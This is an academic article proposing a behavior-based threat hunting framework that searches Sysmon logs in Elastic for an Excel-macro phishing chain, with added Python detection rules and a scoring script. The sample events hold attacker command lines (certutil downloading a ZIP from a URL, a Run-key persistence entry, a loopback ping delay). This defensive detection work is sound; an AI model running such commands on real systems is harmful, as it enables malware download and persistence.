Article

BTH: Behavior-Based Structured Threat Hunting Framework to Analyze and Detect Advanced Adversaries

by Akashdeep Bhardwaj 1, Keshav Kaushik 1, Abdullah Alomari 2, Amjad Alsirhani 3,4, Mohammed Mujib Alshahrani 5 and Salil Bharany 6,*
1 School of Computer Science, University of Petroleum and Energy Studies, Bidholi, Dehradun 248007, India
2 Department of Computer Science, Al-Baha University, Albaha 65799, Saudi Arabia
3 College of Computer and Information Sciences, Jouf University, Sakaka 72388, Saudi Arabia
4 Faculty of Computer Science, Dalhousie University, Halifax, NS B3H 4R2, Canada
5 College of Computing and Information Technology, University of Bisha, Bisha 61361, Saudi Arabia
6 Department of Computer Engineering & Technology, Guru Nanak Dev University, Punjab 143005, India
* Author to whom correspondence should be addressed.
Electronics 2022, 11(19), 2992; https://doi.org/10.3390/electronics11192992
Submission received: 18 August 2022 / Revised: 8 September 2022 / Accepted: 19 September 2022 / Published: 21 September 2022
(This article belongs to the Special Issue Intelligent Data Sensing, Processing, Mining, and Communication)

Abstract
Organizations of every size and industry are facing a new normal. Adversaries have become more sophisticated and persistent than ever before. Every network is facing never-ending onslaughts. Yet many organizations continue to rely on signature-based reactive threat detection and mitigation solutions as the primary line of defense against new-age, cutting-edge attacks. Even conventional attacks can bypass such security solutions. This means legacy protection solutions leave the organization’s data vulnerable to damage, destruction, and theft. Adversarial attacks are like ocean waves: they are very persistent and keep coming like attack campaigns. Sometimes the waves, in our case, attacks, look the same, where indicators of compromise (IoCs) effectively detect the attacks, while sometimes, the waves or attacks change and continue to look different, especially over a while. If somehow the defenders can recognize what is making those attacks or waves and the conditions, then detecting threats and attacks can have a longer-lasting effect of success. This study focuses on the behavior and habits of the attackers that can provide better and long-lasting results when matching adversarial profiles instead of using just IoCs. The paper presents a unique framework for behavior-based structured threat hunting to deliver rapid, consistent remediation against emerging threats and malware on systems and networks.

1. Introduction

Creating adversarial profiles and activities requires good intelligence reports for mitigating and defending security strategies. Indicators of compromise (IoCs) [1] are data suggesting that a cyber-attack may have compromised a computer; they should be present in an intelligence report, but they begin to lose value from the time of the report or of the compromise. As per IBM, threat hunting is a proactive approach to identify non-remediated and unknown threats inside an organization. Crowdstrike defines threat hunting as the process of proactively searching for cyber threats hiding undetected inside enterprise networks. Consistent adversarial behavior helps defend against attacks better than using standard operating procedures (SOPs) [2] and defense skillsets. Threat hunting has gained tremendous traction within the cyber security community [3]. Organizations have realized that while traditional security controls and analysis have served as a cornerstone for an organization’s cyber security compliance, they are no longer sufficient to mitigate operational risks. This is especially true given the ever-increasing attack surfaces of these organizations and the increase in the number and capability of cyber adversaries. This reality has necessitated a paradigm shift from reactive to proactive security, and as a result, organizations increasingly focus on threat hunting to fill this realized gap. However, despite this increase in demand for processes, people, and technologies to enable hunts across environments, many organizations continue to struggle with the establishment of sustainable threat hunting capabilities which can operate in a rigorous and repeatable manner. This struggle is often fed by a litany of business and technical challenges, some of which are unique to threat hunting but many of which are common to security practices.
At its simplest, threat hunting is an iterative and proactive process whereby threat hunters seek out anomalous activity, artefacts, and behaviors within an environment to identify previously unknown and undetected threats. Threat hunting, or cyber threat hunting, proactively identifies ongoing or previously unknown non-remediated attacks and threats inside the organization’s network. Initially, hunts begin with a hypothesis based on triggers, which serve as springboards for deep investigations. Threat intel reports further provide specific IoCs for the two threat hunting models: structured [4] and unstructured [5] threat hunting. Rather than depending solely on automated systems like SIEMs, threat hunting involves manual or machine-assisted techniques. Although alerting is critical, it cannot be the sole priority of a detection tool. Threat hunting augments automated detection with innovative manual and machine learning techniques that aid in identifying malicious and anomalous behaviors. These are translated into valuable information for the detection and investigation of attacks. Different threat hunting models are adopted as:
  • Intel-driven [6] reports and feeds ingested on emerging threat vectors, malware, or vulnerabilities. These are often tailored to validate compromise type of efforts based on targeted knowledge similar in the environment. This helps identify gaps.
  • Situational awareness [7] is useful if the cyber-defence analyst has a deep understanding knowledge of internal risks and critical assets and has spent a long time in the organization. This can be gained if the teams are in the same environment long enough. These are often tailored to scenarios hypothesized around controls and processes that adversaries would exploit and utilize if they entered the environment.
  • Analytics-driven [8] hunting visualizes telemetry in the environment and baselines it, establishing what is normal and what an anomaly is. These hunts are tailored to abnormal changes in human behavior and to rabbit-hole tracing.
  • Hybrid [9] is the most mature level, and this is a blend of all the above.
Structured hunting (sometimes referred to as hypothesis-based threat hunting) is a crucial topic to understand when businesses investigate the usage of threat hunting tactics. Most businesses underutilize this sort of hunting. Still, mature organizations may reap some of the most significant benefits from their efforts by including structured threat hunting in their threat hunting efforts. Unstructured threat hunts are usually haphazard and ad hoc activities that rely heavily on data from internal log sources. Hunters sift through logs on the fly, using basic data manipulation techniques such as pivot tables or other analyst-driven methods, and they frequently rely on investigative tactics such as the principle of least seen to find abnormalities in the data. Structured threat hunting is in contrast to the more common practice of unstructured threat hunting (also known as ad hoc or data-driven hunting). Table 1 below describes the differences between the types of threat hunting.
From a business perspective, one of the most critical challenges organizations are faced with is a skills shortage for threat hunting. This means that many organizations are unable to locate resources to stand up a threat hunting capability, and, for organizations that can conduct threat hunting operations, their programs are largely reliant on only a few highly skilled and technical resources. This often means that any fluctuation in manning can have direct operational impacts. Skill shortage, however, is not the only business-related challenge to threat hunting. Another challenge organizations grapple with is the inherently uncertain nature of threat hunting. This uncertainty can often make it a challenge to appropriately measure the value that threat hunting brings to security operations, which in turn can make it difficult to realize the return on investment (ROI) for organizations. With ongoing skills shortages for most organizations and the challenge of measuring ROI, a common outcome is that threat hunting teams are seconded to, or forgone altogether in favor of, ongoing traditional security operations. From a technical perspective, the number of impediments organizations face in establishing a threat hunting capability is considerable. One of the most common technical challenges is a so-called data deficit. Organizations, dependent upon their current security operations maturity, often find that the depth, breadth, quality, and quantity of their data is insufficient to support threat hunting operations. This challenge can be compounded as security teams come to realize that their existing security controls may not provide sufficient coverage to support more advanced threat hunting.
The ongoing skill shortage also manifests itself as a technical issue for organizations, especially as the number of resources with the depth of experience to develop operational capabilities and conduct threat hunting operations remains very low. The result is often a lack of direction and focus for threat hunting operations, which typically results in a lack of defined processes, as well as ineffective and unreliable hunts. Despite these significant challenges that organizations continue to encounter, there are both demands and a need for mature, reliable, repeatable, and robust hunting capabilities in many organizations.
The highlights of this threat hunting research are as follows:
  • Design and implement an online threat hunting platform;
  • Perform threat hunting based on behavioral patterns instead of using IOCs;
  • Propose a new threat hunting process using the threat intelligence report;
  • Capture threat information and artefacts from logs.
This research is organized into different sections. Section 2 reviews the previous research works and implementations from various journals. Section 3 presents the research methodology, applying the threat intel report under the proposed behavior-based threat hunting framework. Section 4 presents the implementation and platforms used, in the form of an Elastic instance and network traffic logs, and also presents the bad-behavior-based filtering and searches for malicious artifacts as per the intel report. Section 5 presents the results obtained as the artifacts and information regarding the attack, and finally, the conclusion with the future scope is given in Section 6.

2. Literature Survey

Recent years have seen an increase in cyberattacks that affect small, medium, and large enterprises, prompting the creation of solutions to help with risk mitigation. Organizations today receive a lot of threat data from many sources due to the rise in cyberattacks, which has to be ingested, processed, and assessed in order to give useful mitigation insights. Based on research keywords for behavior-based threat hunting, such as IoCs, threat hunting, threat intelligence, structured threat hunting, and unstructured threat hunting, the authors categorized and classified the papers as the first level of review. The authors then searched 243 research papers and, after a four-stage process, shortlisted 22 relevant papers from the literature, as presented in Table 2.
Ajmal et al. [10] proposed a unique hybrid approach for identifying offensive security strategies, techniques, and processes, especially threat hunting using adversary emulation. The suggested method is based on a unique method for introducing adversary emulation (mapping each step) into the threat hunting process. The experimental results reveal that the suggested technique leverages adversary simulation to hunt advanced-level threats and has opposing impacts. Furthermore, the suggested approach’s threat detection capability requires few resources. The suggested method may be utilized to create an offensive security-aware environment for businesses, to discover sophisticated threat and attack methods, and to evaluate their capacity for detecting attacks.
The ability of system security to detect the growing threats is mismatched with those threats. Anti-malware, anti-virus, and endpoint detection are reactive security systems that are ineffective against attacks that are extremely slow and stealthy. The need of the hour is for a proactive strategy, such as threat hunting. Cyber deception and the Cyber Kill Chain with threat hunting have contradictory impacts on identifying and mitigating threats, according to Ajmal et al. [11]. The authors adopted the approach of decoy farms, in which attacks are engaged. Unknown risks were the subject of a revolutionary threat detection and prevention strategy. The research introduced a new simulated network to examine the effectiveness of the strategy by simulating multiple industrial systems running Linux- and Windows-based assaults. The authors found that the suggested technique discovered and blocked attackers before the present reactive approach and security mechanism for heterogeneous devices did, resulting in increased protection. The suggested threat hunting technique has greatly increased the threat detection capabilities, according to the results and testing.
Defenders battling APTs must identify an adversary’s propagation region as rapidly as feasible, employing incident response operations and threat hunting to locate attackers within a compromised network. From both the attacker and defender viewpoints, Berady et al. [12] established a formal attack model. An infinitely powerful actor can compare the differences in knowledge and perception between defenders and attackers using this model, enabling defenders to improve threat hunting quality by identifying false positives and adapting log policy to be investigation-oriented. The authors described an assault campaign that imitated the actual threat known as APT29 in a MITRE-designed model. The quality of the defensive architecture was then thoroughly examined.
Jadidi et al. [13] highlighted missing solutions for unified hunting across integrated IT and OT networks, proposing a threat hunting framework that focused on the detection of cyber threats against industrial devices in the initial stages of the incident lifecycle. The proposed framework has three stages: threat hunting triggers, hunting, and cyber threat intelligence. The threat hunting trigger stage detects occurrences or external resources that may cause the hunting stage to be triggered. To establish a hunting hypothesis and predict the adversary’s future behavior, the hunting stage employs a mix of the MITRE ATT&CK Matrix and the diamond model of intrusion analysis. The validity of this hypothesis was verified by analyzing diamond threat action models. Finally, the cyber threat intelligence stage is in charge of producing IoCs for future threat hunting. The SWaT dataset, Black Energy 3 malware, and PLC-Blaster malware were employed in this research to examine the effectiveness of the proposed framework.
Jahromi et al. [14] provided a deep recurrent neural network approach as a stacked long short-term memory, using global and short input dependencies as a normalization method to avoid random network initialization. The authors were able to eliminate random initialization and increase the accuracy and resilience of malware threat hunting by using pre-training. In comparison to the stacked approach, the proposed method reduced the length of malware OpCode or bytecode sequences and accelerated convergence. As a result, the concluding method’s complexity was lowered. In comparison to a typical model with identical detection time, this resulted in increased accuracy. Smart IoT devices integrated into human life have become routes for hackers’ malicious activities as the Internet of Things (IoT) age has expanded. IoT devices use a variety of Unix-based architectures that conform to the standard binary file specification of the executable and linkable format. Raju et al. [15] focused on presenting an overview of the recent advances in merged IoT malware detection and classification methods. The authors addressed the feature representations, feature extraction strategies, and machine learning models using a modern taxonomy. This study emphasized the practical issues of tracking down cross-architectural IoT malware threats and discussed several possibilities for future research. Industrial IoT devices are now becoming increasingly targeted, owing to their wide use in a variety of applications, including home and corporate environments. Using the grey wolf optimization approach, Haddadpajouh et al. [16] suggested a multi-kernel support vector machine for IoT cloud-edge gateway virus hunting. At the IoT cloud-edge gateway, this meta-heuristic technique is utilized to determine the best attributes for identifying malicious and benign applications.
The model is trained using the IoT malware Opcode and Bytecode training data set, which included both benign and malicious samples, and assessed using the k-fold cross-validation approach. In terms of accuracy, the proposed multi-kernel SVM strategy beats DNNs and fuzzy-based IoT malware hunting strategies while also reducing the computing cost and training time.
Crypto ransomware has radically altered the threat-landscape. By encrypting critical data on victims’ systems, crypto-ransomware disables data custodian access and demands a ransom payment to restore custodian access by decrypting data. The speed and accuracy with which system logs can be mined to hunt for anomalies and eliminate ransomware depend a lot on how fast and accurately it can be detected. Homayoun et al. [17] set up an environment to capture activity logs for the ransomware strains Locky, Cerber, and TeslaCrypt. The authors utilized sequential pattern mining to uncover MFPs of behaviors. The suggested approach was 96.5 percent accurate in determining the family of a given ransomware sample and 99 percent accurate in detecting ransomware cases from goodware samples. The results showed that applying pattern mining approaches to the detection of favorable traits for ransomware hunting is both beneficial and practicable. This research revealed various ransomware families with distinct features and common patterns that could be evaluated to identify ransomware sample families and create knowledge about threat actors and the threat profile of a specific target.
Unmanned underwater vehicles (UUVs) have become vital in today’s maritime environment. Underwater reconnaissance and surveillance, underwater mine hunting, and anti-submarine warfare are only a few of the activities that represent a major and hazardous threat to humans. UUVs have emerged as the leading technology for completing such missions. Yao et al. [18] suggested a technique for evaluating the UUV in an underwater hazard situation based on dynamic Bayesian network modeling. The researchers classified the hazards posed to UUVs into three categories: environmental, platform, and mission factors. The authors performed factor extraction and set up the prior probability based on the features for each of these categories. The incorporation of state transition probability and the creation of a model for assessing the dynamic Bayesian threat scenario were required to set up the static Bayesian network. The dynamic Bayesian simulation was shown to be superior when the results of the static and dynamic Bayesian simulations were compared. Furthermore, by studying the sensitivity, the authors were able to identify the most serious present danger and, as a result, develop the best UUV countermeasures. The findings revealed that the dynamic Bayesian technique has a lot of practical usefulness in threat assessment. The integration of Industry 4.0 and intelligent IoT technologies has enhanced the vulnerability of industrial cyber-physical systems (ICPS) to a diverse variety of network attacks. Assessing cyber threats with intelligent threat detection is a difficult undertaking since it involves interacting with large-scale, sophisticated, and diverse ICPS. Abdel-Basset et al. [19] presented a novel model based on federated deep learning to perform threat hunting against ICPS that captured network data in both temporal and geographical representations.
The authors proposed an innovative framework to deploy as micro-services on relevant edge servers while ensuring adequate resource orchestration using container-based industrial edge computing. An experimental micro-services placement methodology was developed to allow improved micro-services deployment depending on the computational capacity of the participants, to resolve the latency issue of an ICPS. The efficiency of the proposed techniques in terms of high accuracy and F1-scores was evaluated by simulated results obtained from two public benchmarks.
By correlating multi-source data, Ju et al. [20] proposed a multi-layer data fusion approach to detect cyber-attacks. The researchers proposed multi-correlation analysis, which included correlation of events, pattern-knowledge, alerts, and alert-context for identifying anomalous traffic, alert-based known attacks, pattern-based attacks, and alert-pattern attacks, respectively. Despite the simplicity of the suggested framework, they were unable to demonstrate real-world outcomes from it, and they still believe that manual analysis by threat analysts is the best way to track down threats.
Almohannadi et al. [21] proposed cyber threat analysis based on three threat intelligence components, attack, pattern, and behavior, utilizing a viable open-source Elasticsearch engine. This research, however, focused only on honeypot traffic based on the incident, and not on the threat’s history and behavior.
Gao et al. [22] recommended using open-source cyber threat intelligence (OSCTI) to do realistic threat hunting based on system auditing frameworks. The proposed architecture utilized the OSCTI report to extract threat behavior by converting it to a threat behavior graph, which is then ingested into query-based threat hunting to generate a system auditing report as threats are being found. The suggested system’s performance and threat detection accuracy are strongly reliant on the richness of the OSCTI text and/or derived threat information, from which the threat behavior pattern was generated.
By mapping the Microsoft Advanced Threat Analytics data to the diamond model and the Kill Chain model, Ertaul et al. [23] were able to detect intrusions. The resulting mapping emphasized the complexity of an incursion, its phases, and the linkages between the attacker, victim, capability, and infrastructure. During threat hunting in system memory, Javeed et al. [24] stressed the significance of additional memory forensics processes to confirm the presence of malware in the host under study. During the research on network log collection, the investigation overlooked significant artifacts that may have led to the discovery of undiscovered threat patterns.
Dietrich et al. [25] investigated logs from a range of perimeter security devices, including firewall and intrusion detection systems, which were gathered and ingested into the Elastic stack for analysis. Outgoing packets were filtered and displayed, and proactive threat hunting was used to identify unknown threats and validate them using memory forensics.

3. Research Methodology

This research focuses on a threat intelligence report [26] received against a use case involving an IT services organization employing 7000 engineers and staff in over 50 customer locations on-site. The customers include enterprise organizations that are technology, energy, manufacturing, and government agencies, as well as service engineers delivering support to remote offices and locations. The threat intelligence report mentions advanced persistent threat (APT) [27] activity discovered 3 months prior, targeting such service organizations. The activities are seen over networks using common protocols and service applications. From the initial reading, the threat most probably targets the organization we are concerned about; the attack had been in action for the prior 3 months, so a lot of time has already passed and the IoCs could have changed over time. The threat intelligence report summary presents indicators of compromise as sender addresses, malicious attachments, hashes, and file names, as illustrated in Figure 1.
The initial compromise most likely uses phishing with geopolitical references to the US and Antarctica on global warming. The report provides evidence of IoCs on activities using VB script execution: the malicious attachments are sent as macro-enabled Microsoft Office Excel documents through emails, and on opening these attachments, Visual Basic scripts execute the payload. This constitutes the behavior. The report further cites the abuse and execution of COM-based objects, as presented in Figure 2. The attack allows standard system mechanics to execute malicious processes under different mandates or contexts that enable privilege escalation.
The payloads are also observed executing as if they were native Windows Defender software; such techniques are used to blend in and rely on living-off-the-land (LOTL) binaries, which are legitimate executables in the operating system. The payloads mask themselves as components of the Windows Defender framework. The malicious payload maintains persistence by utilizing the ‘RUN’ keys in the local registry hive, which allows execution of the malware even after the system is rebooted. ‘\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater’ is the hive location used to maintain elevated privileges for the malicious payload. According to the threat intelligence report, the LOTL binaries enumerate the host and environment, saving the output in text files, and utilize covert channels to communicate the information to the attacker’s command and control (C&C) server [28] using the HTTP and ICMP protocols. On using standard security processes for identifying and analyzing the breach, no IoCs seem to match. This motivated the researchers to design and implement a behavior-based threat hunting framework named BTH. The setup is configured to report threat hunting based on adversarial activity profiles to defend and build security strategies. IoCs in threat intelligence reports start to depreciate from the time of the report or the compromise. Consistent threat intelligence differs from report to report, so this research focuses on adversarial behavior related to the adversary’s standard operating procedures, skill set, and habits.

4. BTH: Behavior-Based Threat Hunting

The research setup involves hardware with a 4-core CPU, 8 GB memory, and 50 GB disk running the 64-bit Ubuntu operating system. The software tools involved an Elastic instance [29] and Kibana services managed by Docker and accessed over web browsers. After the hardware and software components were implemented to run the Elastic instance, threat logs were ingested using Python code. The logs were initially verified in the Kibana instance for different data and time ranges. The hunting platform uses the MITRE ATT&CK framework to analyze the hunts in this research [30,31,32,33,34,35,36]. The focus of this threat hunting research is to find IoCs based on behavior, using the Elastic instance to search top-down for malicious documents sent to recipients as attachments in the form of macro-enabled Microsoft Excel documents (.xlsm) embedded with VB script that pulls down payloads and executes them, which indicates a phishing attack [37,38,39,40,41,42,43,44].
Elastic Instance is ingested with 242,380 threat logs to analyze as illustrated in Figure 3.
An initial search on the threat hunting platform for Microsoft Office and one of the packages displays information about various attack methods for Windows scripting and executing malicious payload programs, as shown in Figure 4.
The platform provides details of real-world attack executions related to ‘Microsoft Office’ and Excel documents, so the focus is on the Endpoint Sysmon category, as presented in Figure 5, which provides the actual script to query the Elastic instance holding the attack logs.
On executing the script on the threat hunt platform, some hits are reported immediately, highlighting some of the threat activities as illustrated in Figure 6. The next step is to verify if these activities are associated with the threat report.
To validate the findings, two variables, ‘process.parent.executable’ and ‘process.executable’, are filtered on; Figure 7 illustrates Microsoft Excel launching multiple Windows command line terminals.
On further filtering and adding the ‘process.command_line’ and ‘process.parent.command_line’ variables, Figure 8 illustrates that Microsoft Excel calls the command line, creating hidden directories in %AppData%\Defender, and uses a temporary macro-enabled Excel document from the user folder. This is a similar theme to the one reported in the threat intelligence report.
On reviewing more logs, this utilizes certutil.exe, which is a Microsoft binary and part of certificate services, used to dump and display keys and certificates. However, here this utility is being used to download a ZIP file from a GitHub URL and copy it to the hidden folder that was initially created. When unzipped, it contains several payload executables, as presented in Figure 9.
The threat intelligence report in Figure 10 also mentions scripts being executed from the attachments and different methods for delayed execution, which seems to be a bad behavior.
Searching the hunting platform for ‘delayed execution’ provides the result illustrated in Figure 11. This presents the command line, Ping, and Loopback as the possible vectors.
On running the script query for these vectors, two results are obtained, as presented in Figure 12.
On further filtering of the reported findings for ‘process.executable’, ‘process.command_line’, ‘process.parent.executable’, and ‘process.parent.pid’, two results are obtained, as illustrated in Figure 13. These validate the threat report of Ping being utilized and the loopback report, which mentioned 127.0.0.200 instead of 127.0.0.27, pinging 50 times. This is a case of using loopback with a slightly different variation to have the same impact, which indicates the attacker’s behavior.
This validates the case as a behavior-based hunt, with cmd.exe executing via process IDs 10 and 156. On disabling the initial query and searching for those PIDs, Figure 14 illustrates that process.executable launched an executable in the folder, which further executed ‘msmpeg.exe’.
On looking at the whole context of the filtering and execution and searching for only the process IDs 10 and 156, the logs present the Excel document in Figure 15.
The proposed framework, aptly named BTH (Behavior-based Threat Hunting), referred to the threat intel report, ingested the network traffic logs into the Elastic instance, searched and filtered for various IoCs in the hunt platform, and then validated the artifacts and details obtained, which are discussed in the next section.
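The pivots the hunt above performs in Kibana (Excel spawning cmd.exe, certutil.exe fetching a ZIP from a URL, a long loopback ping used as a delay, a Run-key entry for persistence, then walking PIDs back to the originating document) can also be expressed as local behavior rules over Sysmon-style process events. The following is an added example written for this page; it is not code from the paper or from the BTH platform. Field names follow the Elastic Common Schema names the paper filters on (process.executable, process.parent.executable, process.command_line, process.parent.pid); the sample events, paths, hostnames and the ATT&CK technique labels on each rule are constructed assumptions, chosen only to mirror the behaviors described (PIDs 10 and 156 reuse the paper's Excel/cmd.exe pair).

```python
"""Behavior-based hunt rules over Sysmon-style process events (added example)."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry in ECS-style keys; not real logs from the paper.
EVENTS: List[Event] = [
    {"process.pid": "10", "process.parent.pid": "4",
     "process.executable": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "process.parent.executable": r"C:\Windows\explorer.exe",
     "process.command_line": r'"EXCEL.EXE" C:\Users\u\AppData\Local\Temp\invoice.xlsm'},
    {"process.pid": "156", "process.parent.pid": "10",
     "process.executable": r"C:\Windows\System32\cmd.exe",
     "process.parent.executable": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "process.command_line": r'cmd.exe /c mkdir "%AppData%\Defender" & attrib +h "%AppData%\Defender"'},
    {"process.pid": "200", "process.parent.pid": "156",
     "process.executable": r"C:\Windows\System32\certutil.exe",
     "process.parent.executable": r"C:\Windows\System32\cmd.exe",
     "process.command_line": r"certutil.exe -urlcache -f https://example.invalid/pkg.zip %AppData%\Defender\pkg.zip"},
    {"process.pid": "201", "process.parent.pid": "156",
     "process.executable": r"C:\Windows\System32\PING.EXE",
     "process.parent.executable": r"C:\Windows\System32\cmd.exe",
     "process.command_line": "ping -n 50 127.0.0.200"},
    {"process.pid": "202", "process.parent.pid": "156",
     "process.executable": r"C:\Windows\System32\reg.exe",
     "process.parent.executable": r"C:\Windows\System32\cmd.exe",
     "process.command_line": r'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "%AppData%\Defender\msmpeg.exe"'},
    # Benign control: a short ping to an internal host should not fire.
    {"process.pid": "300", "process.parent.pid": "5",
     "process.executable": r"C:\Windows\System32\PING.EXE",
     "process.parent.executable": r"C:\Windows\System32\cmd.exe",
     "process.command_line": "ping -n 4 10.0.0.5"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Case-insensitive file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_shell(e: Event) -> bool:
    """An Office application is the direct parent of a shell/script host."""
    return (basename(e.get("process.parent.executable", "")) in OFFICE_APPS
            and basename(e.get("process.executable", "")) in SHELLS)


def certutil_url_download(e: Event) -> bool:
    """certutil.exe invoked with a URL on its command line (LOTL download)."""
    return (basename(e.get("process.executable", "")) == "certutil.exe"
            and re.search(r"https?://", e.get("process.command_line", ""), re.I) is not None)


def loopback_ping_delay(e: Event, min_count: int = 20) -> bool:
    """ping to any 127.x.x.x address with a large echo count, used as a sleep."""
    if basename(e.get("process.executable", "")) != "ping.exe":
        return False
    cmd = e.get("process.command_line", "")
    m = re.search(r"-n\s+(\d+)", cmd, re.I)
    count = int(m.group(1)) if m else 4  # Windows ping sends 4 echoes by default
    return count >= min_count and re.search(r"\b127\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", cmd) is not None


def run_key_persistence(e: Event) -> bool:
    """Command line or registry path touching a CurrentVersion\\Run key."""
    text = e.get("process.command_line", "") + " " + e.get("registry.path", "")
    return re.search(r"\\currentversion\\run\\?", text, re.I) is not None


# (rule name, ATT&CK technique label chosen by the example author, predicate)
RULES: List[Tuple[str, str, Callable[[Event], bool]]] = [
    ("office_spawns_shell", "T1204.002", office_spawns_shell),
    ("certutil_url_download", "T1105", certutil_url_download),
    ("loopback_ping_delay", "T1497.003", loopback_ping_delay),
    ("run_key_persistence", "T1547.001", run_key_persistence),
]


def hunt(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, pid) for every event that matches a rule, in log order."""
    return [(name, e["process.pid"]) for e in events for name, _tid, pred in RULES if pred(e)]


def ancestry(events: List[Event], pid: str) -> List[str]:
    """Walk process.parent.pid links from a hit back to its root (the PID pivot)."""
    by_pid = {e["process.pid"]: e for e in events}
    chain: List[str] = []
    while pid in by_pid and pid not in chain:
        chain.append(pid)
        pid = by_pid[pid].get("process.parent.pid", "")
    return chain


if __name__ == "__main__":
    for name, pid in hunt(EVENTS):
        print(f"{name:<22} pid={pid:<4} chain={' <- '.join(ancestry(EVENTS, pid))}")
```

Each rule is deliberately keyed on behavior rather than on a hash or file name, so a renamed payload or a different loopback address (127.0.0.200 versus 127.0.0.27 in the hunt above) still matches; the ancestry walk is the local equivalent of dropping the initial query and searching on the PIDs to recover the originating Excel document.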

5. Results Obtained

Organizations often rely on threat hunters for their ability to detect previously unknown and unidentified threats; threat hunting also serves as an invaluable input and resource for an organization’s existing security operations. To that end, threat hunting should serve as a rising tide that lifts all boats within an organization and not remain an isolated lake of knowledge. The proposed framework automatically tailors and deploys a threat hunting package suited to the organization’s unique environment on the SIEM and EDR platforms. Each package includes guided hunt plans and run books for the security teams; these provide actionable threat intelligence, analyst-focused remediation, and cyber threat emulation. This helps in detecting advanced adversaries while maximizing the value of the existing security solutions by transforming traditional CTI into advanced, actionable CTI; see the proposed framework playbook in Figure 16.
The authors propose first performing alert-based investigations together with behavior-based threat hunting aligned with the MITRE matrix. Behaviors include misbehaving Windows PowerShell, HTTP User-Agent strings that may download additional toolsets or malware scripts, unknown process IDs and command-line process executions, DNS tunneling, and logs related to lateral movement resulting in privilege escalation. Reviewing the emails received by the organization reveals viruses, DLP policy violations, and advanced threats, which point to the source of the Email Excel attachment attack, as illustrated in Figure 17.
Figure 18 further confirms the detection of the specific machine and user whose account faced the privilege escalation attack.
From the above hunts, Figure 19 illustrates the threat information and artifacts uncovered, including leading indicators, their types, and the actual artifacts investigated as part of the initial report, which are used to escalate and to build indicators for further investigation.
As illustrated in this research, behavior-based threat hunting uses synthesized criteria to rank order three threat hunt detection profiles and confirm the findings; this recognizes what constitutes a successful threat hunting capability and measures how far or close organizations are to an ideal or fully mature threat hunting program. The accuracy of behavior-based threat hunting depends on the quantity and quality of the data collected, on the methods and capabilities available to visualize and analyze data of varying sources and types, and on the types of analytics that can be applied to the data to enhance hunters’ insights into it. An organization using behavior-based threat hunting would largely address hidden threats in logs. As a result, such organizations are able not only to develop their own hunting content and queries but also to keep pace with the ancillary tasks associated with threat hunting, especially the development of threat detection content.
The authors validated the results using machine learning algorithms for the alternate hypothesis, with synthesized criteria enabling rank ordering of three threat hunt detection profiles. Hunting success is based on the five hunt accuracy criteria presented in Table 3, labelled C1 to C5, with the accepted values given in the Range column and the Weight column representing the percentage values per the scenarios and requirements of the methods. Table 4 presents the Sigma patterns detected and the unknown threat patterns as binary outputs, using three different traffic logs.
Table 5 illustrates the different enterprise threat hunting levels: initially creating the hypothesis to drive the organization’s threat hunting efforts, using threat intel to hypothesize where threats may be found or attacks are executing in the network and systems, and performing behavior-based hunting.
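The rank ordering of hunt detection profiles against the five criteria of Table 3, as an added example that is not the paper's own validation code: each criterion value is normalized into [0, 1] over the Range given in Table 3 and weighted with the Weight column, and the profiles are sorted by the resulting score. The paper does not state how it combines the criteria, so the normalized weighted sum is an assumed combination rule, and the three profiles below are constructed sample values within the Table 3 ranges.

```python
"""Rank ordering threat hunt detection profiles with the Table 3 criteria.

Added example. CRITERIA copies Table 3 of the paper; the combination rule
(normalized weighted sum) and the three profiles are assumptions.
"""

# id -> (name, range low, range high, weight), exactly as listed in Table 3.
CRITERIA = {
    "C1": ("Risk category", 0, 3, 0.41),
    "C2": ("Malware", 1, 12, 0.14),
    "C3": ("Impact potential", 1, 15, 0.10),
    "C4": ("Attack probability", 0, 1, 0.18),
    "C5": ("Breach complexity", 1, 99, 0.35),
}

# Constructed sample profiles (invented values, not the paper's data).
PROFILES = {
    "Profile A": {"C1": 3, "C2": 10, "C3": 14, "C4": 0.9, "C5": 80},
    "Profile B": {"C1": 1, "C2": 3, "C3": 5, "C4": 0.4, "C5": 20},
    "Profile C": {"C1": 2, "C2": 6, "C3": 9, "C4": 0.6, "C5": 50},
}


def normalize(cid, value):
    """Scale a raw criterion value onto [0, 1] using its Table 3 range.

    Raises ValueError if the value lies outside the accepted range, so a
    mistyped score cannot silently dominate the ranking.
    """
    name, lo, hi, _ = CRITERIA[cid]
    if not lo <= value <= hi:
        raise ValueError(f"{cid} ({name}) value {value} outside {lo} to {hi}")
    return (value - lo) / (hi - lo)


def score(profile):
    """Weighted sum of normalized criteria, divided by the total weight so the
    result is in [0, 1] even though the Table 3 weights do not sum to 1."""
    missing = set(CRITERIA) - set(profile)
    if missing:
        raise ValueError(f"profile missing criteria: {sorted(missing)}")
    total_weight = sum(c[3] for c in CRITERIA.values())
    weighted = sum(CRITERIA[cid][3] * normalize(cid, profile[cid]) for cid in CRITERIA)
    return weighted / total_weight


def rank(profiles):
    """Return [(name, score), ...] ordered from highest to lowest score."""
    scored = [(name, round(score(p), 4)) for name, p in profiles.items()]
    return sorted(scored, key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    for name, s in rank(PROFILES):
        print(f"{name}: {s:.4f}")
```

With the sample values the order comes out A, C, B; because Breach complexity and Risk category carry the largest weights in Table 3, a profile that scores high on those two rises even if its Malware count is modest.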

6. Conclusions

As the threat landscape continues to evolve and adversaries continue to develop their tradecraft, organizations are aware of the growing limitations of traditional security practices. As a result, more organizations are looking to threat hunting as a means of further maturing their overall security operations, and the need to understand what threat hunting is and is not, and the role hunting plays in the overall security processes, is more important than ever. This research proposed a unique threat hunting framework that improves cyber threat detection using a behavior-based methodology. It focuses on the behavior and habits of attackers, which provide better and longer-lasting results when matching adversarial profiles than IoCs alone. The framework delivers behavior-based structured threat hunting for rapid, consistent remediation against emerging threats and malware on systems and networks, and the results are validated using machine learning.

Author Contributions

